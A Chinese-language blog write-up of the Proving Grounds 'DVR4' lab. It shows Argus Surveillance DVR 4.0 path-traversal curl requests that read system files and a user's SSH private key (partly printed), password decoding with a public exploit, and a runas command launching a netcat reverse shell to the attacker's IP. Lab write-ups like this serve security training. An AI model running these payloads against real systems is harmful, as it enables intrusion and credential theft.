临渊羡鱼

退而结网

0%

Proving Grounds Practice - DVR4

Posted on In , ,
Proving Grounds Practice Lab中DVR4打靶过程记录, 这是从去年10月份开始截止到目前最令我感到沮丧和挫败的一次打靶

Difficulty

Medium

Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '2004'
OS build: '19041'

[*] ssh found on tcp/22.
     Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)

[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] microsoft-ds found on tcp/445.
    SMB 3.0

[*] http-proxy found on tcp/8080.
    <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
        About the program:
 
    Argus Surveillance DVR
    Program is UNREGISTERED
    Version: 4.0
    Released 18/12/2008
    Argus Surveillance Inc.

    http-vuln-cve2011-3368:
    CVE:CVE-2005-3299  phpmyadmin

[*] unknown found on tcp/5040.

[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669.

22 WinSSHD

windows下的sshd实现,和linux一样在用户.ssh目录下会有公私钥相关文件

8.48版本没有搜索到可利用的已知漏洞

445 SMB

无法匿名登录

1
2
smbclient -L //192.168.140.179 -N
session setup failed: NT_STATUS_ACCESS_DENIED

8080 Argus Surveillance DVR

进入后在user下发现两个用户名,administrator和viewer, 看到有修改密码选项,并且不需要输入原密码,把密码改成123, 然后通过ssh登录,提示密码不正确, gobuster目录扫描也没有收获

1
2
3
4
5
ssh viewer@192.168.140.179 
viewer@192.168.140.179's password: 
Permission denied, please try again.
[email protected]'s password:

searchSploit搜一下已知漏洞,全部复制过来看看说明

50261 是没有引号的service路径,后面可能提权有用,但是poc里面也没有利用方法

50130 弱密码破解,并有提示arugs Surveillance DVR的配置路径,看代码是把加密的字符串按4位字符一组的解码

45296 路径穿越,poc直接测一下, 有结果返回,可以利用,但是能读什么呢

1
2
3
4
5
6
7
8
9
10
11
12
13
14
curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

45312 提权: 在Argus 应用文件夹下放一个恶意 gsm_codec.dll,这个dll会被以SYSTEM账号执行

FootHold

4种exploit 暂时能利用的是路径穿越,结合其他信息,能读的有administrator和viewer的私钥、C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini 配置信息。

  1. 成功读到了viewer账号的私钥
1
2
3
4
5
6
7
8
9
curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fadministrator%2F.ssh%2Fid_rsa"
<HTML><HEAD><TITLE>File Not Found</TITLE></HEAD><BODY><H1>Cannot find this file.</H1>The requested file: <B>/WEBACCOUNT.CGI?OkBtn=  Ok  &RESULTPAGE=../../../../../../../../../../../../../../../../Users/administrator/.ssh/id_rsa</B> was not found.</BODY></HTML>                                                                                                                                               
curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuuXhjQJhDjXBJkiIftPZng7N999zteWzSgthQ5fs9kOhbFzLQJ5J
Ybut0BIbPaUdOhNlQcuhAUZjaaMxnWLbDJgTETK8h162J81p9q6vR2zKpHu9Dhi1ksVyAP
iJ/njNKI0tjtpeO3rjGMkKgNKwvv3y2EcCEt1d+LxsO3Wyb5ezuPT349v+MVs7VW04+mGx
pgheMgbX6HwqGSo9z38QetR6Ryxs+LVX49Bjhskz19gSF4/iTCbqoRo0djcH54fyPOm3OS

登录

1
2
3
4
5
6
ssh viewer@192.168.140.179 -i viewer.id_rsa
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>whoami
dvr4\viewer
  1. 读配置文件, 没有和用户密码相关的信息
1
2
3
4
5
6
7
8
9
10
curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FProgramData%2FPY_Software%2FArgus%20Surveillance%20DVR%2FDVRParams.ini"
[Main]
ServerName=
ServerLocation=
ServerDescription=
ReadH=0
UseDialUp=0
DialUpConName=
DialUpDisconnectWhenDone=0
DIALUPUSEDEFAULTS" checked checked

Escalation

SeShutdownPrivilege

查了下viewer账号下所有文件夹,什么都没有, 在C:下发现了一个output.txt文件,查看内容是以administrator账户执行了 C:\freezeScript\win10.ps1, 运行时间是靶机启动时间

查看脚本的内容,发现C:下 freezeScript文件夹都没有,如果viewer账户可以重启机器,并且有C:写权限的话就可以获得adminstrator权限执行任意代码,查看权限显示有seShutdownPrivilege,写一个把viewer加入administrators group脚本

1
2
3
4
5
6
7
8
9
10
11
12
PS C:\freezeScript> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State  
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\> md freezeScript


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                                        
----                 -------------         ------ ----                                                                                        
d-----         2/21/2025   9:36 AM                freezeScript                                                                                


PS C:\> cd .\freezeScript\
PS C:\freezeScript>  'Add-LocalGroupMember -Group "Administrators" -Member "viewer"'| Out-File -FilePath "C:\freezeScript\win10.ps1"
PS C:\freezeScript> cat win10.ps1
Add-LocalGroupMember -Group "Administrators" -Member "viewer"

重启时提示无权限

1
2
PS C:\freezeScript> shutdown /r /t 0
Access is denied.(5)

GPT的回答

1
尽管你有 SeShutdownPrivilege 权限,这个错误通常是由于缺少管理员权限导致的。在 PowerShell 或命令提示符中执行 shutdown 命令需要管理员权限,即使你有相关权限,也需要以管理员身份运行 PowerShell。

winpeas

上传winpeas执行也没有得到有用信息。viewer的权限也比较低,很多内容收集不到。

DRV4配置

再确认下配置文件, dir发现没有ProgramData文件夹,但是前面已经读到配置文件了,文件夹应该是存在的,dir -froce查看是被隐藏了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
PS C:\freezeScript> cd /
PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                                        
----                 -------------         ------ ----                                                                                        
d-----         2/21/2025   9:40 AM                freezeScript                                                                                
d-----         2/21/2025   6:08 AM                Microsoft                                                                                   
d-----         12/7/2019   1:14 AM                PerfLogs                                                                                    
d-r---         4/15/2022   7:07 AM                Program Files                                                                               
d-r---         6/18/2021   5:55 AM                Program Files (x86)                                                                         
d-r---         12/3/2021  12:21 AM                Users                                                                                       
d-----         4/15/2022   7:07 AM                Windows                                                                                     
-a----         2/21/2025   4:52 AM           2690 output.txt                                                                                  


PS C:\> dir -force


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                                        
----                 -------------         ------ ----                                                                                        
d--hs-         2/21/2025   5:06 AM                $Recycle.Bin                                                                                
d--h--         4/15/2022   5:02 AM                $WinREAgent                                                                                 
d--hs-         4/15/2022   7:08 AM                Config.Msi                                                                                  
d--hsl         6/18/2021  10:28 AM                Documents and Settings                                                                      
d-----         2/21/2025   9:40 AM                freezeScript                                                                                
d-----         2/21/2025   6:08 AM                Microsoft                                                                                   
d-----         12/7/2019   1:14 AM                PerfLogs                                                                                    
d-r---         4/15/2022   7:07 AM                Program Files                                                                               
d-r---         6/18/2021   5:55 AM                Program Files (x86)                                                                         
d--h--         12/3/2021  12:24 AM                ProgramData                                                                                 
d--hs-         3/11/2022  10:03 PM                Recovery                                                                                    
d--hs-         6/18/2021   3:31 AM                System Volume Information                                                                   
d-r---         12/3/2021  12:21 AM                Users                                                                                       
d-----         4/15/2022   7:07 AM                Windows                                                                                     
-a-hs-          8/1/2024  10:33 PM           8192 DumpStack.log.tmp                                                                           
-a----         2/21/2025   4:52 AM           2690 output.txt                                                                                  
-a-hs-          8/1/2024  10:33 PM      671088640 pagefile.sys                                                                                
-a-hs-          8/1/2024  10:33 PM      268435456 swapfile.sys                                                                                


PS C:\> cd '.\ProgramData\PY_Software\Argus Surveillance DVR\'
PS C:\ProgramData\PY_Software\Argus Surveillance DVR> dir -force


    Directory: C:\ProgramData\PY_Software\Argus Surveillance DVR


Mode                 LastWriteTime         Length Name                                                                                        
----                 -------------         ------ ----                                                                                        
d-----         12/3/2021  12:26 AM                Gallery                                                                                     
d-----         12/3/2021  12:24 AM                Images                                                                                      
d-----         12/3/2021  12:26 AM                Logs                                                                                        
-a----         2/21/2025   9:28 AM             38 Argus Surveillance DVR.DVRSes                                                               
-a----         2/21/2025   9:45 AM           5782 DVRParams.ini

cat DVRParams.ini看下内容, 这次展示了很多内容,看来是通过cur查看到时候展示行数有限,被截断了。在user部分有administrator的密码密文

回到50130.py破解之

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
python 50130.py 
/home/kali/Tools/pg/DVR4/50130.py:27: SyntaxWarning: invalid escape sequence '\_'
  banner = '''

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown

最后一个字符没有解出来,看 代码注释,是作者没加特殊字符的编码信息

特殊字符不多,以administrator用户执行反弹shell, 输入密码一个个试下,输入$时,成功获取shell。

1
2
runas /env /profile /user:DVR4\Administrator "C:\temp\nc.exe -e cmd.exe 192.168.118.14 443
Enter the password for DVR4\Administrator:  
1
2
3
4
5
6
7
8
9
nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.140.179] 51874
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\ProgramData\PY_Software\Argus Surveillance DVR>whoami
whoami
dvr4\administrator

官方walkThrough中是在user页面新建了一个user用户,密码设为全部字符 !@#$%^&*()在通过配置文件里的密码对比得到密码明文

之前一直以为runas只能在有桌面环境的前提下使用

gsm_codec.dll提权

靶机上没有gcc环境,未测试

反思

本文是我在逐步看了hits之后依然没有成功后,看了完成walkThrough后,重头重新打靶的记录。但是更令我感到挫败和沮丧的是如果重新遇到这个靶机,并且整体思路、步骤正确的情况下我仍然可能拿不下这台靶机, 它让我推翻自己之前解决问题的方式

  1. 信息收集阶段
    1. 在看到了arugs surveillance存在的几个漏洞之后,我放弃了继续在web页面上继续收集信息,导致没能找到viewer用户
    2. 弱密码破解poc看了之后发现用不到,并没有认真看代码,忽略了其中的配置文件注释,也尝试读取这个文件
    3. 更为严重的是:即使在这一步我看到了配置文件路径,并且测试读了配置文件,但是没有有效信息,在后续拿到viewer shell之后,我还是不会想到再去检查一次这个配置文件,因为在我的脑子里是排除法,****一直在排查自己认为无法有效利用的东西,下意识里给自己减轻因为知识面不足、经验不足带来的心虚的负担
  2. 提权阶段
    1. 在发现seShutdownPrivilege无法提权,并且winpeas没有找到有用信息后,完全没了思路,哪怕再去搜一下DRV4的相关信息呢,过于依赖工具了。
    2. 更为严重的是:即使在这一步我成功找到了配置文件,我相信自己仍然不会第一时间想到searchSploit已经发现的exploit, 因为在我的脑海是排查法,一直在排除自己认为无法有效利用的东西,下意识里给自己减轻因为知识面不足、经验不足带来的心虚的负担

信息收集很重要,不要忽略任何信息,不要做减法排查,从最有可能的点着手,而不是像自己以前优先排除后聚焦的解决问题方式